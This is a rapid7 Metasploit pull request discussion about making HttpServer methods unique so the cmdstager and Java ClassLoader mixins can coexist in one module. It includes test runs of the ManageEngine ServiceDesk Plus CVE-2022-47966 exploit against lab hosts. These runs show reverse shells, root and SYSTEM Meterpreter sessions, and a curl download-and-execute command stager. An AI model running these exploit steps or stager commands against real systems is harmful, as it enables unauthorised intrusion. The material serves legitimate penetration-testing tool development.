rapid7
Allow multiple HttpServer services to coexist in a module
Adding multiple HttpServer services in a module is sometimes complex since they share the same methods. This usually causes issues like this, where #on_request_uri needs to be overridden to handle requests coming from each service.
This PR is an attempt to fix this by making the common methods used by the HttpServer service unique. These methods are:
start_serviceon_request_uriresource_uri
For now, I updated the cmdstager and the Java HTTP ClassLoader mixins, since these are commonly used in the same module. The multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module as been updated to be compatible with these changes. The override of on_request_uri is not necessary anymore and has been removed.
I left this PR as a draft since other modules will need to be updated (those using the Java HTTP ClassLoader). But I wanted to get feedback before moving forward.
How to test
The best way to test this is to install the vulnerable application (instructions can be found here) and test target 0 (Java (in-memory)), target 1 (Windows EXE Dropper) and target 4 (Linux Dropper). They all should work as expected.
Scenarios
ManageEngine ServiceDesk Plus versions 14003 on Ubuntu 20.04.4
Target 0 (Java (in-memory))
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true
[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/ZsavWaZESNHRpE/
[*] GET /ZsavWaZESNHRpE/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending 200
[*] GET /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending the payload configuration data
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Shell.class requested
[+] Sending additional payload class: javapayload/stage/Shell.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Stage.class requested
[+] Sending additional payload class: javapayload/stage/Stage.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/StreamForwarder.class requested
[+] Sending additional payload class: javapayload/stage/StreamForwarder.class
[*] Command shell session 1 opened (192.168.128.1:4444 -> 192.168.128.187:59514) at 2024-02-13 16:02:21 +0100
[*] Exploit completed.
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
Target 4 (Linux Dropper)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 4
target => 4
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true
[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/WjgySU59DILnpv
[*] Generated command stager: ["curl -so /tmp/SrxbFAqg http://192.168.128.1:8080/WjgySU59DILnpv;chmod +x /tmp/SrxbFAqg;/tmp/SrxbFAqg;rm -f /tmp/SrxbFAqg"]
[*] Client 192.168.128.187 (curl/7.68.0) requested /WjgySU59DILnpv
[*] Sending payload to 192.168.128.187 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.128.187
[*] Meterpreter session 2 opened (192.168.128.1:4444 -> 192.168.128.187:41398) at 2024-02-13 16:03:33 +0100
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter >
ManageEngine ServiceDesk Plus versions 14003 on Windows Server 2019
Target 1 (Windows EXE Dropper)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 1
target => 1
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.188 lhost=192.168.128.1 verbose=true
[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQA...[SNIP]...
[*] Command Stager progress - 17.01% done (2046/12025 bytes)
[*] Command Stager progress - 34.03% done (4092/12025 bytes)
[*] Command Stager progress - 51.04% done (6138/12025 bytes)
[*] Command Stager progress - 68.06% done (8184/12025 bytes)
[*] Command Stager progress - 84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.128.188
[*] Meterpreter session 3 opened (192.168.128.1:4444 -> 192.168.128.188:50309) at 2024-02-13 16:12:48 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
meterpreter >
Thanks, looks good to me. Wondering if we should have a lint check for method overrides on certain "protected method calls" like start_service to avoid having to do passes like this every once in a while
Thanks @sempervictus ! Sorry for the delay, I'm just returning to this PR now.
This is actually a good idea. Maybe a rubocop rule. The problem is that other protocols uses start_service (LDAP server, SMB server, TFTP server, etc.) and we will need to think about a strategy to avoid too much changes in the libraries. For now, tis PR just addresses issues with CmdStager and Java HTTP ClassLoader, which have been commonly used together in the same module.
Great fix Christophe. Seems to me like you've covered all the necessary refactoring and testing was as expected 👍
Java (in-memory)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/blH2Q6lkhkg8l2/
[*] Sending stage (57971 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:52314) at 2024-06-17 13:32:23 -0700
[*] Server stopped.
meterpreter > getuid
Server username: DESKTOP-N3ORU31$
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
Windows EXE Dropper
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 1
target => 1
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command Stager progress - 17.01% done (2046/12025 bytes)
[*] Command Stager progress - 34.03% done (4092/12025 bytes)
[*] Command Stager progress - 51.04% done (6138/12025 bytes)
[*] Command Stager progress - 68.06% done (8184/12025 bytes)
[*] Command Stager progress - 84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.135:52329) at 2024-06-17 13:38:47 -0700
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
smeterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Windows Command
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
target => 2
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (201798 bytes) to 172.16.199.135
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.135:52332) at 2024-06-17 13:42:40 -0700
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Unix Command
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.131:46306) at 2024-06-17 14:21:12 -0700
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2
Architecture : x64
System Language : en_CA
Meterpreter : python/linux
meterpreter > exit
Linux Dropper
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 4
target => 4
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/ZzdM1sy
[*] Client 172.16.199.131 (curl/7.81.0) requested /ZzdM1sy
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 5 opened (172.16.199.1:4444 -> 172.16.199.131:39252) at 2024-06-17 14:21:35 -0700
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: root
symeterpreter > sysinfo
Computer : 172.16.199.131
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Release Notes
Adding multiple HttpServer services in a module is sometimes complex since they share the same methods. This usually this causes where #on_request_uri needs to be overridden to handle requests coming from each service. This updates the cmdstager and the Java HTTP ClassLoader mixins, since these are commonly used in the same module. This also updates the manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module to make use of these new changes